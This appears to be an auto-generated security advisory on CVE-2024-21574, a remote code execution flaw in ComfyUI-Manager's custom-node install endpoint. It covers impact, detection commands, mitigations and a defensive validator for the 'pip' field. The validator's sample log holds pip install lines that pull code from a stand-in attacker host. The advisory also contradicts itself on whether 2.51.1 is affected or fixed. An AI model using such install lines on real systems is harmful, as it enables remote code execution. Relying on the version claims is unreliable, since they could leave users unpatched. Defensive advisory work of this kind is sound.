Platform: python
Component: comfyui-manager
Fixed in: 2.51.1
CVE-2024-21574 describes a remote code execution (RCE) vulnerability in ComfyUI-Manager, a Python-based application. This vulnerability arises from insufficient validation of the 'pip' field within a POST request to the /customnode/install endpoint, which is used for installing custom nodes. Successful exploitation allows an attacker to trigger a pip install on a user-controlled package or URL, leading to arbitrary code execution on the server. Affected versions include 0.0.0 up to and including 2.51.1; upgrading to version 2.51.1 resolves the issue.
The impact of CVE-2024-21574 is severe. An attacker who successfully exploits this vulnerability can achieve complete control over the ComfyUI-Manager server. This includes the ability to execute arbitrary commands, install malware, steal sensitive data, and potentially pivot to other systems on the network. The vulnerability's reliance on the pip package installer makes it particularly dangerous, as attackers can leverage malicious packages from compromised repositories or even host their own. Given ComfyUI-Manager's use in AI workflows, this could lead to data poisoning or the execution of unauthorized AI models, further expanding the potential damage. The lack of input validation directly enables this RCE, making it a high-priority concern.
CVE-2024-21574 was publicly disclosed on December 12, 2024. The vulnerability's simplicity and the widespread use of pip make it a likely candidate for exploitation. While no public proof-of-concept (PoC) has been widely reported, the ease of crafting a malicious pip command suggests that one could emerge quickly. The EPSS score is likely to be assessed as medium to high, given the RCE nature and the relative ease of exploitation. It is not currently listed on the CISA KEV catalog.
Organizations and individuals utilizing ComfyUI-Manager for AI workflows, particularly those with exposed instances or those allowing custom node installations from untrusted sources, are at significant risk. Shared hosting environments where multiple users share the same ComfyUI-Manager instance are especially vulnerable, as an attacker could potentially compromise the entire environment through a single user's custom node installation.
• linux / server:
journalctl -u comfyui-manager -g 'pip install' | grep -i error
• python / supply-chain:
import subprocess
# Checks that pip is on PATH and reports its version; no package is installed.
result = subprocess.run(['pip', 'install', '--version'], capture_output=True, text=True)
print(result.stdout)
• generic web:
# Only confirms whether the endpoint answers from this network position.
curl -I http://<comfyui_manager_ip>/customnode/install | grep 'pip'
EPSS: 7.10% (91st percentile)
The primary mitigation for CVE-2024-21574 is to immediately upgrade ComfyUI-Manager to version 2.51.1 or later. If upgrading is not immediately feasible due to compatibility concerns or breaking changes, consider implementing temporary workarounds. Restrict network access to the /customnode/install endpoint to trusted sources only. Implement a Web Application Firewall (WAF) with rules to block requests containing suspicious or malicious pip commands. Carefully review and validate any custom node installations before applying them. Monitor system logs for unusual pip activity or unexpected process executions. While a direct detection signature is difficult without deeper analysis of the pip install process, monitor for the execution of unusual Python scripts or the installation of unexpected packages.
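As an added example (not ComfyUI-Manager's own code, and the manifest shape and log lines are constructed), the following shows the kind of allowlist validation the 'pip' field needs before anything reaches pip, and reuses the same check to triage journal lines for pip installs that carry URLs, options or paths instead of plain requirement strings. It deliberately accepts only a project name with an optional exact "==" pin; loosen that to your own policy.

```python
import re
import shlex
import sys

# Allowlist for one requirement string: a PEP 503-style project name and an
# optional exact "==version" pin. URLs, VCS specs ("git+https://..."), local
# paths, pip options ("--index-url") and anything with whitespace fail.
_SAFE_REQ = re.compile(
    r"^[A-Za-z0-9](?:[A-Za-z0-9._-]{0,62}[A-Za-z0-9])?"   # project name
    r"(?:==[0-9][A-Za-z0-9.+!-]{0,31})?$"                 # optional exact pin
)

def is_safe_requirement(spec):
    return isinstance(spec, str) and _SAFE_REQ.fullmatch(spec) is not None

def plan_install(node_manifest):
    """Validate the 'pip' field of a custom-node manifest (constructed shape:
    {"pip": [...]}) and return the argv pip would be run with.
    Raises ValueError on the first unsafe entry, before pip is ever invoked."""
    reqs = node_manifest.get("pip", [])
    if not isinstance(reqs, list):
        raise ValueError("'pip' must be a list of requirement strings")
    for spec in reqs:
        if not is_safe_requirement(spec):
            raise ValueError(f"rejected pip requirement: {spec!r}")
    # argv form, never a shell string; validated specs cannot start with '-'.
    return [sys.executable, "-m", "pip", "install", *reqs]

def suspicious_pip_installs(log_lines):
    """Log triage: return lines whose 'pip install' carries any argument that
    would not pass is_safe_requirement (URL, option, path, unparsable)."""
    hits = []
    for line in log_lines:
        idx = line.find("pip install")
        if idx < 0:
            continue
        try:
            args = shlex.split(line[idx + len("pip install"):])
        except ValueError:          # unbalanced quoting: treat as suspicious
            hits.append(line)
            continue
        if any(not is_safe_requirement(a) for a in args):
            hits.append(line)
    return hits

# Constructed sample journal lines (not real output from any host).
SAMPLE_LOG = [
    "Dec 12 10:01:02 host comfyui[4242]: pip install numpy==1.26.4",
    "Dec 12 10:03:15 host comfyui[4242]: pip install https://attacker.invalid/node.tar.gz",
    "Dec 12 10:04:40 host comfyui[4242]: pip install --index-url http://attacker.invalid/simple Pillow",
]
```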
Update ComfyUI-Manager to version 2.51.1 or later. This version fixes the remote code execution vulnerability by correctly validating the 'pip' field in the POST request to the /customnode/install endpoint. To update, use the Python package manager (pip) or follow the plugin developer's instructions.
CVE-2024-21574 is a critical remote code execution vulnerability in ComfyUI-Manager versions 0.0.0 through 2.51.1. It allows attackers to execute arbitrary code by exploiting a missing input validation in the /customnode/install endpoint.
You are affected if you are running ComfyUI-Manager versions 0.0.0 to 2.51.1. Immediately upgrade to version 2.51.1 or later to mitigate the risk.
The recommended fix is to upgrade ComfyUI-Manager to version 2.51.1 or later. If upgrading is not immediately possible, restrict access to the /customnode/install endpoint and implement WAF rules.
While no widespread exploitation has been confirmed, the vulnerability's ease of exploitation suggests it is a likely target. Monitor your systems closely for suspicious activity.
Refer to the ComfyUI-Manager project's official repository and release notes for the latest information and security advisories.